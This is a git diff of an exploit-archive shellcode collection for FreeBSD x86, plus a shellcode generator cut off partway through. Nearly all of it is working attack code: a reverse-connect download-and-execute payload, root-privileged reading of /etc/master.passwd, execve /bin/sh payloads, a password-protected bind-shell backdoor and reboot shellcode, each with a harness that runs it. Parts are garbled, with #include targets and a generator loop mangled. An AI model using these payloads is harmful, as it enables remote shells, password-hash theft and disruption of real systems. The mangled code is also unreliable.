--- a/platforms/freebsd_x86/shellcode/13265.c +++ b/platforms/freebsd_x86/shellcode/13265.c @@ -1,102 +1,102 @@ -/* -; sm4x - 2008 -; reverse connect dl(shellcode) and execute, exit -; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ;) -; - feed it with a $nc -vvl -p8000 pls exit from jmp shellcode) -xor eax, eax -inc eax -push eax -push eax -int 0x80 - -*/ - -#include -#include -#include - -char code[] = "\x31\xc0\x50\x50\xb0\x17\x50\xcd\x80\x50" - "\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89" - "\xc2\x68\xac\x11\x00\x09\x68\xaa\x02\x1f" - "\x40\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0" - "\x62\x50\xcd\x80\x75\x24\xb1\x03\x31\xdb" - "\x53\x52\xb0\x5a\x50\xcd\x80\x43\xe2\xf6" - "\x31\xc0\x66\x68\x04\x04\x8d\x8c\x24\xfc" - "\xfb\xff\xff\x51\x52\xb0\x03\x50\xcd\x80" - "\xff\xe1\x31\xc0\x40\x50\x50\xcd\x80"; - -int main(int argc, char **argv) { - int (*func)(); - printf("Bytes: %d\n", sizeof(code)); - func = (int (*)()) code; - (int)(*func)(); -} - +/* +; sm4x - 2008 +; reverse connect dl(shellcode) and execute, exit +; - i've used this to feed pwnd progs huge messy shellcode ret'ing the results over nc ;) +; - feed it with a $nc -vvl -p8000 pls exit from jmp shellcode) +xor eax, eax +inc eax +push eax +push eax +int 0x80 + +*/ + +#include +#include +#include + +char code[] = "\x31\xc0\x50\x50\xb0\x17\x50\xcd\x80\x50" + "\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89" + "\xc2\x68\xac\x11\x00\x09\x68\xaa\x02\x1f" + "\x40\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0" + "\x62\x50\xcd\x80\x75\x24\xb1\x03\x31\xdb" + "\x53\x52\xb0\x5a\x50\xcd\x80\x43\xe2\xf6" + "\x31\xc0\x66\x68\x04\x04\x8d\x8c\x24\xfc" + "\xfb\xff\xff\x51\x52\xb0\x03\x50\xcd\x80" + "\xff\xe1\x31\xc0\x40\x50\x50\xcd\x80"; + +int main(int argc, char **argv) { + int (*func)(); + printf("Bytes: %d\n", sizeof(code)); + func = (int (*)()) code; + (int)(*func)(); +} + // milw0rm.com [2008-09-05] \ No newline at end of file 
diff --git a/platforms/freebsd_x86/shellcode/13266.asm b/platforms/freebsd_x86/shellcode/13266.asm index b1153df3c..7c20081ec 100755 --- a/platforms/freebsd_x86/shellcode/13266.asm +++ b/platforms/freebsd_x86/shellcode/13266.asm 
@@ -1,70 +1,70 @@ -; sm4x 2008 -; /bin/cat /etc/master.passwd -; 65 bytes -; FreeBSD 7.0-RELEASE - -global _start -_start: - -xor eax, eax - -; --- setuid(0) -push eax -push eax -mov al, 0x17 -int 0x80 - -; --- setup /etc/master.passwd -jmp short load_file -ok: -pop esi - -; setup /bin/cat -push eax -push 0x7461632f -push 0x6e69622f -mov ebx, esp - -; --- array setup -push eax ; null -push esi ; /etc/master.passwd -push ebx ; /bin/cat -mov edx, esp - -; -- execve() -push eax ; 0 -push edx ; array { "/bin/cat", "/etc/master.passwd", 0} -push ebx ; /bin/cat -mov al, 0x3b -push eax -int 0x80 - -; --- exit -push eax -push eax -int 0x80 - -load_file: -call ok -db '/etc/master.passwd' - -/* - -char code[] = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f" - "\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62" - "\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50" - "\x52\x53\xb0\x3b\x50\xcd\x80\x50\x50\xcd" - "\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63" - "\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61" - "\x73\x73\x77\x64"; - -int main(int argc, char **argv) { - int (*func)(); - printf("Bytes: %d\n", sizeof(code)); - func = (int (*)()) code; - (int)(*func)(); -} - -*/ - +; sm4x 2008 +; /bin/cat /etc/master.passwd +; 65 bytes +; FreeBSD 7.0-RELEASE + +global _start +_start: + +xor eax, eax + +; --- setuid(0) +push eax +push eax +mov al, 0x17 +int 0x80 + +; --- setup /etc/master.passwd +jmp short load_file +ok: +pop esi + +; setup /bin/cat +push eax +push 0x7461632f +push 0x6e69622f +mov ebx, esp + +; --- array setup +push eax ; null +push esi ; /etc/master.passwd +push ebx ; /bin/cat +mov edx, esp + +; -- execve() +push eax ; 0 +push edx ; array { "/bin/cat", "/etc/master.passwd", 0} +push ebx ; /bin/cat +mov al, 0x3b +push eax +int 0x80 + +; --- exit +push eax +push eax +int 0x80 + +load_file: +call ok +db '/etc/master.passwd' + +/* + +char code[] = "\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f" + "\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62" + "\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50" + 
"\x52\x53\xb0\x3b\x50\xcd\x80\x50\x50\xcd" + "\x80\xe8\xdc\xff\xff\xff\x2f\x65\x74\x63" + "\x2f\x6d\x61\x73\x74\x65\x72\x2e\x70\x61" + "\x73\x73\x77\x64"; + +int main(int argc, char **argv) { + int (*func)(); + printf("Bytes: %d\n", sizeof(code)); + func = (int (*)()) code; + (int)(*func)(); +} + +*/ + ; milw0rm.com [2008-08-25] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13269.c b/platforms/freebsd_x86/shellcode/13269.c index e35abca82..918cc37f7 100755 --- a/platforms/freebsd_x86/shellcode/13269.c +++ b/platforms/freebsd_x86/shellcode/13269.c @@ -1,43 +1,43 @@ -/* - -Encoded SUB shellcode execve /bin/sh of 48 bytes -by anderson_underground@hotmail.com - -Hack 'n Roll - -*/ - - -char shellcode[] = -"\x31\xd2" -"\xeb\x0e" -"\x31\xdb" -"\x5b" -"\xb1\x19" -"\x83\x2c\x1a\x01" -"\x42" -"\xe2\xf9" -"\xeb\x05" -"\xe8\xed\xff\xff\xff" -"\x32\xc1" -"\x51" -"\x69\x30\x30\x74\x69\x69" -"\x30\x63\x6a" -"\x6f" -"\x32\xdc" -"\x8a\xe4" -"\x51" -"\x55" -"\x54" -"\x51" -"\xb1\x3c" -"\xce" -"\x81"; - - -main(){ -printf("Length: %d\n",strlen(shellcode)); -asm("call shellcode"); -} - +/* + +Encoded SUB shellcode execve /bin/sh of 48 bytes +by anderson_underground@hotmail.com + +Hack 'n Roll + +*/ + + +char shellcode[] = +"\x31\xd2" +"\xeb\x0e" +"\x31\xdb" +"\x5b" +"\xb1\x19" +"\x83\x2c\x1a\x01" +"\x42" +"\xe2\xf9" +"\xeb\x05" +"\xe8\xed\xff\xff\xff" +"\x32\xc1" +"\x51" +"\x69\x30\x30\x74\x69\x69" +"\x30\x63\x6a" +"\x6f" +"\x32\xdc" +"\x8a\xe4" +"\x51" +"\x55" +"\x54" +"\x51" +"\xb1\x3c" +"\xce" +"\x81"; + + +main(){ +printf("Length: %d\n",strlen(shellcode)); +asm("call shellcode"); +} + // milw0rm.com [2008-08-19] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13270.c b/platforms/freebsd_x86/shellcode/13270.c index e57a9b6e7..e33187151 100755 --- a/platforms/freebsd_x86/shellcode/13270.c +++ b/platforms/freebsd_x86/shellcode/13270.c 
@@ -1,184 +1,184 @@ -/* -THE ZUGCODE - SMALL REMOTE 6ACKD0R -FreeBSD i386 bind shell with auth -code by MahDelin -Big thx SST [kaka, nolife, white] -Listen on the port 4883 the /bin/sh -*/ - -/* -void zugcode(void ) -{ -//socket -__asm__("xorl %eax, %eax"); -__asm__("pushl %eax"); -__asm__("pushl %eax"); -__asm__("pushl $0x01"); -__asm__("pushl $0x02"); -__asm__("movl %esp, %ebp"); -__asm__("pushl %ebp"); -__asm__("movb $0x61, %al"); -__asm__("int $0x80"); - -//struct sockaddr_in -__asm__("movl %eax, %edi"); -__asm__("xorl %eax, %eax"); -__asm__("movb $0x02, 9(%ebp)"); -__asm__("movw $0x1313, 10(%ebp)"); -__asm__("movl %eax, 12(%ebp)"); -__asm__("leal 8(%ebp), %ecx"); - -//bind -__asm__("xor %ebx,%ebx"); -__asm__("movb $0x10,%bl"); -__asm__("push %ebx"); -__asm__("push %ecx"); -__asm__("push %edi"); -__asm__("push %eax"); -__asm__("movb $0x68, %al"); -__asm__("int $0x80"); - -//listen -__asm__("xor %eax, %eax"); -__asm__("pushl %eax"); -__asm__("pushl $0x01"); -__asm__("pushl %edi"); -__asm__("pushl %eax"); -__asm__("movb $0x6a, %al"); -__asm__("int $0x80"); - -//accept -__asm__("xor %eax, %eax"); -__asm__("push %ebx"); -__asm__("pushl %eax"); -__asm__("pushl %eax"); -__asm__("pushl %edi"); -__asm__("pushl %eax"); -__asm__("movb $0x1e, %al"); -__asm__("int $0x80"); - -__asm__("mov %eax, %esi"); -__asm__("xor %eax, %eax"); -__asm__("pushl $0x203a7465"); -__asm__("pushl $0x72636573"); -__asm__("movl %esp, %ebx"); -__asm__("push %eax"); -__asm__("push $0x8"); -__asm__("pushl %ebx"); -__asm__("push %esi"); -__asm__("xor %eax, %eax"); -__asm__("push %eax"); -__asm__("movb $0x65, %al"); -__asm__("int $0x80"); - -//rcev password -__asm__("xor %eax, %eax"); -__asm__("pushl %ebp"); -__asm__("movl %esp, %ebp"); -__asm__("movb $0x20, %al"); -__asm__("subl %eax, %esp"); -__asm__("xor %eax, %eax"); -__asm__("push %eax"); -__asm__("mov $0x80, %al"); -__asm__("push %eax"); -__asm__("xor %eax, %eax"); -__asm__("push %ebp"); -__asm__("push %esi"); -__asm__("push %eax"); 
-__asm__("movb $0x66, %al"); -__asm__("int $0x80"); - -//compare password -//save registers %esi, %edi -__asm__("mov %edi, %ebx"); -__asm__("mov %esi, %edx"); -__asm__("mov %eax, %ecx"); -__asm__(".word 0x50eb"); -__asm__("pop %esi"); -__asm__("mov %ebp, %edi"); -__asm__("repe cmpsb"); -__asm__(".word 0x4275"); -__asm__("mov %ebx, %edi"); -__asm__("mov %edx, %esi"); - -//dup2 stdin -__asm__("xorl %eax, %eax"); -__asm__("pushl %eax"); -__asm__("pushl %esi"); -__asm__("pushl %eax"); -__asm__("movb $0x5a, %al"); -__asm__("int $0x80"); - -//dup2 stdout -__asm__("xorl %eax, %eax"); -__asm__("inc %eax"); -__asm__("pushl %eax"); -__asm__("pushl %esi"); -__asm__("xorl %eax, %eax"); -__asm__("pushl %eax"); -__asm__("movb $0x5a, %al"); -__asm__("int $0x80"); - -//dup2 stderr -__asm__("xorl %eax, %eax"); -__asm__("add $0x2, %eax"); -__asm__("pushl %eax"); -__asm__("pushl %esi"); -__asm__("xorl %eax, %eax"); -__asm__("pushl %eax"); -__asm__("movb $0x5a, %al"); -__asm__("int $0x80"); - -// /bin/sh -__asm__("xor %ecx, %ecx"); -__asm__("pushl %ecx"); -__asm__("pushl $0x68732f2f"); -__asm__("pushl $0x6e69622f"); -__asm__("movl %esp, %ebx"); -__asm__("pushl %ecx"); -__asm__("pushl %ebx"); -__asm__("movl %esp, %edx"); -__asm__("pushl %ecx"); -__asm__("pushl %edx"); -__asm__("pushl %ebx"); -__asm__("pushl %ecx"); -__asm__("movb $0x3b, %al"); -__asm__("int $0x80"); - -//exit -__asm__("xorl %eax, %eax"); -__asm__("inc %eax"); -__asm__("pushl %eax"); -__asm__("pushl %eax"); -__asm__("int $0x80"); - -__asm__(".byte 0xe8"); -__asm__(".long 0xffffffab"); -__asm__(".asciz \"payhash\12\""); -} -*/ - -unsigned char zug[] = -"\x31\xc0\x50\x50\x6a\x01\x6a\x02\x89\xe5\x55\xb0\x61\xcd\x80\x89\xc7\x31" -"\xc0\xc6\x45\x09\x02\x66\xc7\x45\x0a\x13\x13\x89\x45\x0c\x8d\x4d\x08\x31" -"\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xc0\x50\x6a\x01\x57\x50" -"\xb0\x6a\xcd\x80\x31\xc0\x53\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31" 
-"\xc0\x68\x65\x74\x3a\x20\x68\x73\x65\x63\x72\x89\xe3\x50\x6a\x08\x53\x56" -"\x31\xc0\x50\xb0\x65\xcd\x80\x31\xc0\x55\x89\xe5\xb0\x20\x29\xc4\x31\xc0" -"\x50\xb0\x80\x50\x31\xc0\x55\x56\x50\xb0\x66\xcd\x80\x89\xfb\x89\xf2\x89" -"\xc1\xeb\x50\x5e\x89\xef\xf3\xa6\x75\x42\x89\xdf\x89\xd6\x31\xc0\x50\x56" -"\x50\xb0\x5a\xcd\x80\x31\xc0\x40\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31" -"\xc0\x83\xc0\x02\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31\xc9\x51\x68\x2f" -"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe2\x51\x52\x53\x51" -"\xb0\x3b\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80\xe8\xab\xff\xff\xff\x70\x61" -"\x79\x68\x61\x73\x68\x0a"; - -main() -{ -int (*zugcode)(); -printf("shellcode len, %d bytes\n", strlen(zug)); -zugcode = (int (*)()) zug; -(int)(*zugcode)(); -} - +/* +THE ZUGCODE - SMALL REMOTE 6ACKD0R +FreeBSD i386 bind shell with auth +code by MahDelin +Big thx SST [kaka, nolife, white] +Listen on the port 4883 the /bin/sh +*/ + +/* +void zugcode(void ) +{ +//socket +__asm__("xorl %eax, %eax"); +__asm__("pushl %eax"); +__asm__("pushl %eax"); +__asm__("pushl $0x01"); +__asm__("pushl $0x02"); +__asm__("movl %esp, %ebp"); +__asm__("pushl %ebp"); +__asm__("movb $0x61, %al"); +__asm__("int $0x80"); + +//struct sockaddr_in +__asm__("movl %eax, %edi"); +__asm__("xorl %eax, %eax"); +__asm__("movb $0x02, 9(%ebp)"); +__asm__("movw $0x1313, 10(%ebp)"); +__asm__("movl %eax, 12(%ebp)"); +__asm__("leal 8(%ebp), %ecx"); + +//bind +__asm__("xor %ebx,%ebx"); +__asm__("movb $0x10,%bl"); +__asm__("push %ebx"); +__asm__("push %ecx"); +__asm__("push %edi"); +__asm__("push %eax"); +__asm__("movb $0x68, %al"); +__asm__("int $0x80"); + +//listen +__asm__("xor %eax, %eax"); +__asm__("pushl %eax"); +__asm__("pushl $0x01"); +__asm__("pushl %edi"); +__asm__("pushl %eax"); +__asm__("movb $0x6a, %al"); +__asm__("int $0x80"); + +//accept +__asm__("xor %eax, %eax"); +__asm__("push %ebx"); +__asm__("pushl %eax"); +__asm__("pushl %eax"); +__asm__("pushl %edi"); +__asm__("pushl %eax"); 
+__asm__("movb $0x1e, %al"); +__asm__("int $0x80"); + +__asm__("mov %eax, %esi"); +__asm__("xor %eax, %eax"); +__asm__("pushl $0x203a7465"); +__asm__("pushl $0x72636573"); +__asm__("movl %esp, %ebx"); +__asm__("push %eax"); +__asm__("push $0x8"); +__asm__("pushl %ebx"); +__asm__("push %esi"); +__asm__("xor %eax, %eax"); +__asm__("push %eax"); +__asm__("movb $0x65, %al"); +__asm__("int $0x80"); + +//rcev password +__asm__("xor %eax, %eax"); +__asm__("pushl %ebp"); +__asm__("movl %esp, %ebp"); +__asm__("movb $0x20, %al"); +__asm__("subl %eax, %esp"); +__asm__("xor %eax, %eax"); +__asm__("push %eax"); +__asm__("mov $0x80, %al"); +__asm__("push %eax"); +__asm__("xor %eax, %eax"); +__asm__("push %ebp"); +__asm__("push %esi"); +__asm__("push %eax"); +__asm__("movb $0x66, %al"); +__asm__("int $0x80"); + +//compare password +//save registers %esi, %edi +__asm__("mov %edi, %ebx"); +__asm__("mov %esi, %edx"); +__asm__("mov %eax, %ecx"); +__asm__(".word 0x50eb"); +__asm__("pop %esi"); +__asm__("mov %ebp, %edi"); +__asm__("repe cmpsb"); +__asm__(".word 0x4275"); +__asm__("mov %ebx, %edi"); +__asm__("mov %edx, %esi"); + +//dup2 stdin +__asm__("xorl %eax, %eax"); +__asm__("pushl %eax"); +__asm__("pushl %esi"); +__asm__("pushl %eax"); +__asm__("movb $0x5a, %al"); +__asm__("int $0x80"); + +//dup2 stdout +__asm__("xorl %eax, %eax"); +__asm__("inc %eax"); +__asm__("pushl %eax"); +__asm__("pushl %esi"); +__asm__("xorl %eax, %eax"); +__asm__("pushl %eax"); +__asm__("movb $0x5a, %al"); +__asm__("int $0x80"); + +//dup2 stderr +__asm__("xorl %eax, %eax"); +__asm__("add $0x2, %eax"); +__asm__("pushl %eax"); +__asm__("pushl %esi"); +__asm__("xorl %eax, %eax"); +__asm__("pushl %eax"); +__asm__("movb $0x5a, %al"); +__asm__("int $0x80"); + +// /bin/sh +__asm__("xor %ecx, %ecx"); +__asm__("pushl %ecx"); +__asm__("pushl $0x68732f2f"); +__asm__("pushl $0x6e69622f"); +__asm__("movl %esp, %ebx"); +__asm__("pushl %ecx"); +__asm__("pushl %ebx"); +__asm__("movl %esp, %edx"); +__asm__("pushl %ecx"); 
+__asm__("pushl %edx"); +__asm__("pushl %ebx"); +__asm__("pushl %ecx"); +__asm__("movb $0x3b, %al"); +__asm__("int $0x80"); + +//exit +__asm__("xorl %eax, %eax"); +__asm__("inc %eax"); +__asm__("pushl %eax"); +__asm__("pushl %eax"); +__asm__("int $0x80"); + +__asm__(".byte 0xe8"); +__asm__(".long 0xffffffab"); +__asm__(".asciz \"payhash\12\""); +} +*/ + +unsigned char zug[] = +"\x31\xc0\x50\x50\x6a\x01\x6a\x02\x89\xe5\x55\xb0\x61\xcd\x80\x89\xc7\x31" +"\xc0\xc6\x45\x09\x02\x66\xc7\x45\x0a\x13\x13\x89\x45\x0c\x8d\x4d\x08\x31" +"\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xc0\x50\x6a\x01\x57\x50" +"\xb0\x6a\xcd\x80\x31\xc0\x53\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31" +"\xc0\x68\x65\x74\x3a\x20\x68\x73\x65\x63\x72\x89\xe3\x50\x6a\x08\x53\x56" +"\x31\xc0\x50\xb0\x65\xcd\x80\x31\xc0\x55\x89\xe5\xb0\x20\x29\xc4\x31\xc0" +"\x50\xb0\x80\x50\x31\xc0\x55\x56\x50\xb0\x66\xcd\x80\x89\xfb\x89\xf2\x89" +"\xc1\xeb\x50\x5e\x89\xef\xf3\xa6\x75\x42\x89\xdf\x89\xd6\x31\xc0\x50\x56" +"\x50\xb0\x5a\xcd\x80\x31\xc0\x40\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31" +"\xc0\x83\xc0\x02\x50\x56\x31\xc0\x50\xb0\x5a\xcd\x80\x31\xc9\x51\x68\x2f" +"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe2\x51\x52\x53\x51" +"\xb0\x3b\xcd\x80\x31\xc0\x40\x50\x50\xcd\x80\xe8\xab\xff\xff\xff\x70\x61" +"\x79\x68\x61\x73\x68\x0a"; + +main() +{ +int (*zugcode)(); +printf("shellcode len, %d bytes\n", strlen(zug)); +zugcode = (int (*)()) zug; +(int)(*zugcode)(); +} + // milw0rm.com [2006-07-19] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13271.c b/platforms/freebsd_x86/shellcode/13271.c index c2fbab5d9..58c5c2f36 100755 --- a/platforms/freebsd_x86/shellcode/13271.c +++ b/platforms/freebsd_x86/shellcode/13271.c 
@@ -1,29 +1,29 @@ -/* - * - * FreeBSD_x86-reboot-7b.c (Shellcode, reboot(RB_AUTOBOOT), 7 bytes) - * - * by IZ - * - */ - - -char shellcode[] = -"\x31\xc0" /* xor %eax,%eax */ - -"\x50" /* push %eax */ -"\xb0\x37" /* mov $0x37,%al */ -"\xcd\x80"; /* int $0x80 */ - - -void main() -{ - int* ret; - - ret = (int*) &ret + 2; - - printf("len %d\n",strlen(shellcode)); - - (*ret) = (int) shellcode; -} - +/* + * + * FreeBSD_x86-reboot-7b.c (Shellcode, reboot(RB_AUTOBOOT), 7 bytes) + * + * by IZ + * + */ + + +char shellcode[] = +"\x31\xc0" /* xor %eax,%eax */ + +"\x50" /* push %eax */ +"\xb0\x37" /* mov $0x37,%al */ +"\xcd\x80"; /* int $0x80 */ + + +void main() +{ + int* ret; + + ret = (int*) &ret + 2; + + printf("len %d\n",strlen(shellcode)); + + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-04-19] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13272.c b/platforms/freebsd_x86/shellcode/13272.c index 6b8e49981..2f6432938 100755 --- a/platforms/freebsd_x86/shellcode/13272.c +++ b/platforms/freebsd_x86/shellcode/13272.c 
@@ -1,39 +1,39 @@ -/* - - * - * FreeBSD_x86-execve_sh-23b-iZ.c (Shellcode, execve /bin/sh, 23 bytes) - * - * by IZ - * - */ - - -char setreuidcode[] = - -"\x31\xc0" /* xor %eax,%eax */ -"\x50" /* push %eax */ -"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f (//sh) */ -"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f (/bin)*/ - -"\x89\xe3" /* mov %esp,%ebx */ -"\x50" /* push %eax */ -"\x54" /* push %esp */ -"\x53" /* push %ebx */ - -"\x50" /* push %eax */ -"\xb0\x3b" /* mov $0x3b,%al */ -"\xcd\x80"; /* int $0x80 */ - - -void main() -{ - int* ret; - - ret = (int*) &ret + 2; - - printf("len %d\n",strlen(setreuidcode)); - - (*ret) = (int) setreuidcode; -} - +/* + + * + * FreeBSD_x86-execve_sh-23b-iZ.c (Shellcode, execve /bin/sh, 23 bytes) + * + * by IZ + * + */ + + +char setreuidcode[] = + +"\x31\xc0" /* xor %eax,%eax */ +"\x50" /* push %eax */ +"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f (//sh) */ +"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f (/bin)*/ + +"\x89\xe3" /* mov %esp,%ebx */ +"\x50" /* push %eax */ +"\x54" /* push %esp */ +"\x53" /* push %ebx */ + +"\x50" /* push %eax */ +"\xb0\x3b" /* mov $0x3b,%al */ +"\xcd\x80"; /* int $0x80 */ + + +void main() +{ + int* ret; + + ret = (int*) &ret + 2; + + printf("len %d\n",strlen(setreuidcode)); + + (*ret) = (int) setreuidcode; +} + // milw0rm.com [2006-04-14] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13274.c b/platforms/freebsd_x86/shellcode/13274.c index d3bb2fa51..761925e90 100755 --- a/platforms/freebsd_x86/shellcode/13274.c +++ b/platforms/freebsd_x86/shellcode/13274.c @@ -34,6 +34,6 @@ int main(){ * "call jmpme \n" * * ".string \"/bin/sh\" \n"); * *} * - *****************************************/ - + *****************************************/ + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13275.c b/platforms/freebsd_x86/shellcode/13275.c index 68506af6f..7ef97cc65 100755 --- a/platforms/freebsd_x86/shellcode/13275.c 
+++ b/platforms/freebsd_x86/shellcode/13275.c @@ -52,6 +52,6 @@ main(void) int *ret; ret = (int*)&ret+2; (*ret) = shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13276.c b/platforms/freebsd_x86/shellcode/13276.c index e2f6ffb99..29bf94914 100755 --- a/platforms/freebsd_x86/shellcode/13276.c +++ b/platforms/freebsd_x86/shellcode/13276.c @@ -83,6 +83,6 @@ main(void) void (*code)() = (void *)_freebsd_code; printf("strlen code: %d\n", strlen(freebsd_code)); code(); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/freebsd_x86/shellcode/13277.c b/platforms/freebsd_x86/shellcode/13277.c index bbfb2cd30..5b050516d 100755 --- a/platforms/freebsd_x86/shellcode/13277.c +++ b/platforms/freebsd_x86/shellcode/13277.c @@ -74,6 +74,6 @@ main(void) void (*code)() = (void *)freebsd_code; printf("strlen code: %d\n", strlen(freebsd_code)); code(); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/generator/shellcode/13281.c b/platforms/generator/shellcode/13281.c index d588a34cf..3ed42b131 100755 --- a/platforms/generator/shellcode/13281.c +++ b/platforms/generator/shellcode/13281.c 
@@ -1,194 +1,194 @@ -/* *\ -[] [] -[] Shellcode Generator null byte free. [] -[] [] -[] Author: certaindeath [] -[] Site: certaindeath.netii.net (at the moment under construction) [] -[] [] -[] This program generates a shellcode which uses the stack to store the command (and its arguments). [] -[] Afterwords it executes the command with the system call "execve". [] -[] [] -[] The code is a bit knotty, so if you want to understand how it works, I've added an example of assembly at the end. [] -[] [] -\* */ -#include -#include -#include -#include -#include -#define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command - -void print_c(__u8*,int); -void push_shc(__u8*, char*, int*); -int main(int argc, char *argv[]){ - char cmd[255], *a; - FILE *c; - int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2; - __u8 *shc,start[2]={0x31,0xc0}, end[16]={0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0}; - - if(argc<2){ - printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" - "| Shellcode Generator |\n" - "| by certaindeath |\n" - "| |\n" - "| Usage: ./generator |\n" - " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); - _exit(1); - } - a=(char *)malloc((9+strlen(argv[1]))*sizeof(char)); - - //find the command path - a[0]=0; - strcat(a, "whereis "); - strcat(a, argv[1]); - c=popen(a, "r"); - while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c))); - while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c))); - cmd[--k]=0; - - if(k==0){ - printf("No executables found for the command \"%s\".\n", argv[1]); - _exit(1); - } - - if(strlen(cmd)>254){ - printf("The lenght of the command path can't be over 254 bye.\n"); - _exit(1); - } - - for(i=2;i254){ - printf("The lenght of each command argument can't be over 254 byte.\n"); - _exit(1); - } - //work out the final shellcode lenght - b=(k%2); - b1=(b==1) ? 
(((k-1)/2)%2) : ((k/2)%2); - totl+=(6+5*((k-(k%4))/4)+4*b1+7*b); - for(i=2; i2) - push_shc(shc, argv[argc-1], &shp); - else - push_shc(shc, cmd, &shp); - memset(shc+(shp++), 0x89, 1); - memset(shc+(shp++), 0xe6, 1); - if(argc>2){ - for(i=argc-2;i>1;i--) - push_shc(shc, argv[i], &shp); - push_shc(shc, cmd, &shp); - } - memset(shc+(shp++), 0x50, 1); - memset(shc+(shp++), 0x56, 1); - if(argc>2){ - for(i=argc-2;i>1;i--){ - memset(shc+(shp++), 0x83, 1); - memset(shc+(shp++), 0xee, 1); - memset(shc+(shp++), strlen(argv[i])+1, 1); - memset(shc+(shp++), 0x56, 1); - } - memset(shc+(shp++), 0x83, 1); - memset(shc+(shp++), 0xee, 1); - memset(shc+(shp++), strlen(cmd)+1, 1); - memset(shc+(shp++), 0x56, 1); - } - memcpy(shc+shp, end, 16); - print_c(shc,totl); - return 0; -} -void print_c(__u8 *s,int l){ - int k; - for(k=0;k +#include +#include +#include +#include +#define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command + +void print_c(__u8*,int); +void push_shc(__u8*, char*, int*); +int main(int argc, char *argv[]){ + char cmd[255], *a; + FILE *c; + int k=0, totl=(SETRUID ? 
32:22), b,b1, i, tmp=0, shp=2; + __u8 *shc,start[2]={0x31,0xc0}, end[16]={0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0}; + + if(argc<2){ + printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" + "| Shellcode Generator |\n" + "| by certaindeath |\n" + "| |\n" + "| Usage: ./generator |\n" + " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"); + _exit(1); + } + a=(char *)malloc((9+strlen(argv[1]))*sizeof(char)); + + //find the command path + a[0]=0; + strcat(a, "whereis "); + strcat(a, argv[1]); + c=popen(a, "r"); + while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c))); + while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c))); + cmd[--k]=0; + + if(k==0){ + printf("No executables found for the command \"%s\".\n", argv[1]); + _exit(1); + } + + if(strlen(cmd)>254){ + printf("The lenght of the command path can't be over 254 bye.\n"); + _exit(1); + } + + for(i=2;i254){ + printf("The lenght of each command argument can't be over 254 byte.\n"); + _exit(1); + } + //work out the final shellcode lenght + b=(k%2); + b1=(b==1) ? 
